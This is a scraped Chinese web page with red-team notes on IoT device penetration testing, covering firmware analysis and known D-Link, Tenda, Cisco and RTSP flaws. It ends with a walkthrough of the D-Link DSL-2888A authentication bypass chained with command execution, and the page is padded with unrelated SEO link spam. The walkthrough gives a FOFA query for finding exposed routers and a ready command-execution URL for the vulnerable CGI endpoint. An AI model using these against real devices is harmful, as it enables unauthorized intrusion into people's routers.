当前位置: 首页 > news >正文

找做玻璃的网站个人网站免费源码

找做玻璃的网站,个人网站免费源码,住房和城乡建设部网站查询,景洪市新农村建设网站红队专题 设备安全概述物联网设备层次模型设备通信模型 渗透测试信息收集工具 实战分析漏洞切入点D-link 850L 未授权访问 2017 认证绕过认证绕过 D-link DCS-2530Ltenda 系列 路由器 前台未授权RTSP 服务未授权 访问 弱口令命令注入思科 路由器 固件二进制 漏洞 IoT漏洞-D-Lin…

在这里插入图片描述

红队专题

  • 设备安全概述
    • 物联网设备层次模型
    • 设备通信模型
  • 渗透测试
    • 信息收集
    • 工具
  • 实战分析
    • 漏洞切入点
      • D-link 850L 未授权访问 2017 认证绕过
      • 认证绕过 D-link DCS-2530L
      • tenda 系列 路由器 前台未授权
      • RTSP 服务未授权 访问
    • 弱口令
    • 命令注入
      • 思科 路由器
    • 固件二进制 漏洞
  • IoT漏洞-D-Link路由
    • CVE-2020-24581/24579 RCE
    • 简介
    • 影响范围
    • FOFA

设备安全概述

Nday 案例分析
黑盒白盒 方法

物联网设备层次模型

在这里插入图片描述

  • 固件提取 Rom flash 数据提取
    内核 文件系统

二进制逆向分析
pcb 攻击

设备通信模型

在这里插入图片描述

渗透测试

信息收集

在这里插入图片描述反向代理

交换机端口镜像

串口 usb–ttl

tcpdump

管理口

在这里插入图片描述rtsp 视频传输 解析

9898 控制端口

在这里插入图片描述

工具

在这里插入图片描述 依赖 固件模拟

实战分析

在这里插入图片描述
抓包 信息泄露

诊断 ping? 命令执行

配置导出 配置文件信息 信息泄露 越权

漏洞切入点

在这里插入图片描述

堆栈溢出
读写
格式化字符串

私有协议 - 端口

后门-调试维护

在这里插入图片描述
在这里插入图片描述

D-link 850L 未授权访问 2017 认证绕过

在这里插入图片描述PHP + C++
CGI

文件读取

认证绕过 D-link DCS-2530L

在这里插入图片描述
固件 —>字符串 —>web 路径 —>重放

tenda 系列 路由器 前台未授权

在这里插入图片描述
在这里插入图片描述未授权 + 命令执行

RTSP 服务未授权 访问

在这里插入图片描述

在这里插入图片描述逆向rtsp 进程

字符串 访问路径

在这里插入图片描述

弱口令

在这里插入图片描述
在这里插入图片描述

命令注入

思科 路由器

在这里插入图片描述在这里插入图片描述

加入随机字符
看设备 是否正常

固件二进制 漏洞

在这里插入图片描述

IoT漏洞-D-Link路由

CVE-2020-24581/24579 RCE

简介

D-Link DSL-2888A AU_2.31_V1.1.47ae55之前版本漏洞源于
包含一个execute cmd.cgi特性、该特性允许经过身份验证的用户执行操作系统命令,
在该版本固件中同时存在着一个
不安全认证漏洞(CVE-2020-24580),
在登录界面输入任意密码就可以成功访问路由器界面,
组合这两个漏洞以实现未授权的任意代码执行。

影响范围

AU_2.31_V1.1.47ae55 <=

EG_1.00b4

FOFA

body="DSL-2888A" && server=="uhttpd" && status_code=="200"

访问主页
/page/login/login.html

在这里插入图片描述
这里不管什么参数都会识别,参数没有进行限制

 首先输入任意用户名密码,待提示登陆失败后继续进行下一步 
/cgi-bin/execute_cmd.cgi?timestamp=test&cmd=ifconfig

在这里插入图片描述

http://www.yayakq.cn/news/416854/

相关文章:

  • 汕头设计网站建设网站建设开发流程
  • 官网站站陕西省国家示范校建设专题网站
  • wordpress+特色缩略图淄博网站seo
  • 沧州好的做网站的公司手机网站模板 html5
  • 做公司+网站建设价格低wordpress有插件怎么用
  • 石家庄网站制作系统大连网站关键词排名
  • spark网站开发濮阳建设工程交易网中标公示
  • 网站代码生成网站郑州网站建设网站开发
  • 手机网站设计资讯贵阳网站设计模板
  • 建设企业网站是静态还是动态好江西省工程造价信息网官网
  • 微信公众号怎么进行网站建设微信公众号服务平台电话
  • o2o平台的基本信息seo代运营
  • 什么网站的地图出入库管理系统软件
  • html5移动网站模板凡客优品家居官网
  • 凡科可以建设多个网站吗做网站如何选择数据源
  • 承德网站制作的流程wordpress小蜜蜂
  • 北京网站开发专员百度指数特点
  • 定安免费建站公司网站建立项目步骤
  • 学校怎么创建网站wordpress工具包
  • 企业建设网站目的是什么意思建站重庆
  • asp网站的缺点wordpress 首页 404
  • 如何知道网站用什么程序做的html5软件安装视频
  • 上海网站建设招标小白自己做网站
  • 一个网站怎么做提现自动到账网站服务器崩溃一般多久可以恢复
  • 网站建设适合的企业wordpress的后台文章图文发布
  • 做艺术网站素材教学设计模板
  • 口碑好的网站建设公司做电脑图标的网站
  • 餐饮业网站源码 织梦wordpress建站有什么好处
  • 寻找电子商务网站建设网站源文件修改
  • 网站开发的基础广州网络推广seo